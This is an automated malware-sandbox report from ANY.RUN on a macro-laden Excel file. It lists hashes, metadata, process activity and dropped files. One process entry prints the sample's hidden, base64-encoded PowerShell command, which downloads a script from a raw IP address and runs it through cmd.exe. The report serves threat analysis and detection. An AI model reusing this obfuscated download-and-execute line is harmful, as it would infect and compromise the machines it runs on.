analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

4262e1fb680a241aa90698983bdeae53

Full analysis: https://app.any.run/tasks/d0a8d7c8-115f-460c-bf6d-230a4fbb98e7
Verdict: Malicious activity
Analysis date: September 11, 2019, 02:19:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ronaldinho424, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Aug 6 16:18:30 2018, Last Saved Time/Date: Sun Sep 8 14:24:18 2019, Security: 0
MD5:

4262E1FB680A241AA90698983BDEAE53

SHA1:

0BBFAC0753E61F69B6C01EA2E6B32D800F05BA4D

SHA256:

76DCB0F8548ACFA4A2C0BA6922C2A0036A5F6D0F95DBFF7DA28A8F1907842F69

SSDEEP:

1536:FctwMMIOLujPxBR2L6of3CwA+qbLXjTyrmw8zq4lMK+aK6Jxr3IsUQZz:FctwMMIOLujPxBR2L6of3CwA+qbLXjT3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2860)
    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 2860)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3752)
    • Starts application with an unusual extension

      • powershell.exe (PID: 3752)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2860)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: ronaldinho424
LastModifiedBy: Windows User
Software: Microsoft Excel
CreateDate: 2018:08:06 15:18:30
ModifyDate: 2019:09:08 13:24:18
Security: None
CodePage: Unicode (UTF-8)
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: Sayfa1
HeadingPairs:
  • Çalışma Sayfaları
  • 1
CompObjUserTypeLen: 37
CompObjUserType: Microsoft Excel 2003 ?alisma Sayfasi
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs powershell.exe no specs more.com no specs

Process information

PID
CMD
Path
Indicators
Parent process
2860"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3752powershell.exe -w hidden -noexit -enc JABOAFUATABMAD0ATQBhAG4AKABHAGUAdAAtAEMAbwBtAG0AYQBuAGQAIAAqAHQAYQAqAGkAKgBzACoAVAByACoAYQBuACoAKQA7ACYAKABHAGUAdAAtAEMAbwBtAG0AYQBuAGQAIAAqAHQAYQAqAGkAKgBzACoAVAByACoAYQBuACoAKQBoAHQAdABwADoALwAvADQANgAuADQALgAyADIANwAuADIAMAAzAC8AZgBsAGEAdAAuAGIAZQBjACAAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABFAHgAeQBuAG8AcwAuAGoAcwAgAHwAIABjAG0AZAAuAGUAeABlACAALwBjACAAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABFAHgAeQBuAG8AcwAuAGoAcwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3740"C:\Windows\system32\more.com"C:\Windows\system32\more.compowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
More Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
775
Read events
691
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2860EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8F64.tmp.cvr
MD5:
SHA256:
3752powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\38ODIO8U2XKZH7Q9EY7F.temp
MD5:
SHA256:
3752powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169649.TMPbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
3752powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info